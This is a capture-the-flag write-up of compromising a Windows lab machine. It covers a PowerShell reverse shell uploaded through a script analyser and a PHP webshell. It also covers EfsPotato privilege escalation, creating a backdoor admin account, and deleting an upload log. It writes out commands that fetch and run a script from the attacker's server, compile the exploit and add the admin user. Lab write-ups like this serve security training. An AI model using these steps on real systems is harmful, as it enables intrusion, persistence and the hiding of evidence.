Evasion

cf3f97a99b10e6cd388057dc0e2b820c.png
Target IP: 10.10.130.66
Challenge Description:
8920a4d4cce09ddefb17b4bdd20632fe.png


Reconnaissance

6daeddb50066950f339063da5a62b384.png
Performing a port scan using the command sudo nmap -sS 10.10.130.66 -Pn -p- -g 80 against the target Windows machine returns the result above. However, the description of this challenge mentions to visit the application on port 8080.

0dd9b60c38246b89e2aec51a3a4e367b.png
I will primarily focus on the application on port 8080, as this is the main task of this challenge. It is to evade the security mechanisms in place on the target machine. I performed an aggressive scan against port 8080 using the command sudo nmap -sV -A 10.10.130.66 -Pn -p 8080 -g 80 and obtained the result shown above. By the looks of it, the target machine is running Apache 2.4.56 web server. The title of the web application also mentions PowerShell Script Analyser. Maybe I can upload a malicious PowerShell script to obtain a reverse shell?


Enumeration & Exploitation

Port 8080: HTTP
c5e4c29f2cc45ee57a50b6add4da0ada.png
The webpage above is displayed to me when I visit this port. This web application takes in a .ps1 PowerShell script via a file upload. I viewed the source-code of this webpage, but I did not find anything useful. Time to test the web application via file uploads.

4f71ccb79e7a75f95c7ac16d9c5497f4.png
I searched for PowerShell reverse shell scripts in .ps1 format, and found the GitHub repository shown above. Then I downloaded a copy of the reverse shell script on my machine with the name as shell.ps1.

e543d61cfbc81e5396be2a8a8832ddaa.png
I made the changes to the IP and port, as shown above. If this file is successfully uploaded and executed by the target machine, it will invoke a reverse shell connection to my machine at port 80.

5bd527a3cb708bdec48aec41b0c76d88.png
I started a listener on my machine at port 80. I chose to upload the malicious shell.ps1 as shown in the image above.

ba27d8db0cc0627325a197c99ab3bf42.png
And bingo! The malicious script was successfully uploaded. The script was executed by the target machine without any issues, as shown in the image above.

2194cb3d7777671ec0f9e4424a8f0db7.png
Now I have a reverse shell connection from the target machine, as shown above. After waiting for a few seconds, the target machine invoked a connection. Now I have a foothold on the target machine, as shown above. Time to escalate my privileges and obtain the flags!


Privilege Escalation

b9997238a9c60a7ec88531746077d3de.png
After some manual enumeration, I did not find anything useful. Then I decided to use an automated privilege escalation checker from the Github repository shown above. I downloaded the PrivescChecker.ps1 on my machine. Time to serve this file to the target machine. I started a Python HTTP server on my machine at port 443.

dba0ffc156e200f1c4c6e5eff3f9da6f.png
Then using the commands iwr -uri http://10.14.55.153:443/PrivescCheck.ps1 -o PrivescCheck.ps1 and powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck", I executed the privilege escalation checker tool as shown above. Time to look for useful privesc information now.

f504f2d3324dbc391a1fb6bbf47f3b02.png
Right off the bat, I noticed the crucial information above. By the looks of it, the user evader has write permissions at C:\xampp\ directory including the httpd.exe binary file. From previous enumeration, I know the web application is being served at htdocs. Maybe I can upload a webshell here so it gets executed?

7c12ef2df001a475aff0c14772c02e52.png
I transferred the webshell to the target machine. I used the PHP webshell from this Github repository.

e22894dead4b302ccb37d9180c9b6b6a.png
And bingo! Now I can use the PHP webshell, as shown above. Time to enumerate further.

6f6d8e5a7ba18eb92a097abf31376ff5.png
Voila! Running the command whoami /priv shows the SeImpersonatePrivilege privilege is set.

1a4b30d5fd7cafa0294afc6031709daf.png
I located the EfsPotato exploit at this Github repository shown above for this privilege escalation vector. Then I downloaded the EfsPotato.cs on my machine. Then I transferred this to the target machine via the PHP webshell at htdocs directory of c:\xampp\.

30432f84a50f5d6809ef0fae29919168.png
Since the exploit has to be compiled, I have to locate a C# compiler on the target machine. After some manual enumeration, I located it at C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe. Then using this, I compiled the C# code by using the command C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe EfsPotato.cs -nowarn:1691,618. Now I have an executable file.

f3a07eed3eb151eb68e47c13dca85d88.png
And running the command EfsPotato.exe "whoami" shows the result above. Now I have a nt authority\system shell on the target machine. I cannot use this to read the contents of the last flag; therefore, I will create an admin user and login to read the final flag.

e774a821c967427fa2cda178e3d68b85.png
The command I used is EfsPotato.exe "cmd.exe /c net user root password123@ /add && net localgroup administrators root /add". Since port 3389 is also open, I can RDP into the target machine as this new admin user :)
After creating the user root with administrator privileges, I ran the command net user. This command output the new user, as shown above. Running net user root shows this user is part of the administrators group. However, I am unable to RDP into the target machine via xfreerdp.

57395b3bb59398e115489ee45266c300.png
Using the command xfreerdp /u:root /p:password123@ /v:10.10.130.66, I RDPed into the target machine as the user root as shown above. Now I have full RDP administrator access on the target machine. GG.


Flags

f593dd2f322f8d5d03201e108b3a59ff.png
After landing a shell on the target machine, I notice there is an unusual file with the name encodedflag at the Desktop of the current user, as shown above. The content of the encoded flag is shown above.

9e934b2446366e5b5c54798693625d27.png
I used Cyberchef to decode the flag, and obtained the result above. The decoded string mentions me to visit http://10.10.130.66:8080/asdasdadasdjakjdnsdfsdfs.php to obtain the first flag.

6a9ff9ff2a13eb109620e0523f0fdb14.png
However, visiting http://10.10.130.66:8080/asdasdadasdjakjdnsdfsdfs.php displays the message above. Time to find & remove these log files for file uploads mentioned in the image above.

b87519aa2ec0ce1b5e4518ef09bc91e8.png
After some enumeration, I found the log files for file uploads at C:\xampp\htdocs\uploads. Then using the command Remove-Item log.txt, I removed the log file. And bingo! After removing the file, I was able to read the flag at the http://10.10.130.66:8080/asdasdadasdjakjdnsdfsdfs.php URL as shown above.

05e6f70836b64fd9caf13a21d8a6596d.png
The root flag is shown above. This flag is located at Desktop of user Administrator.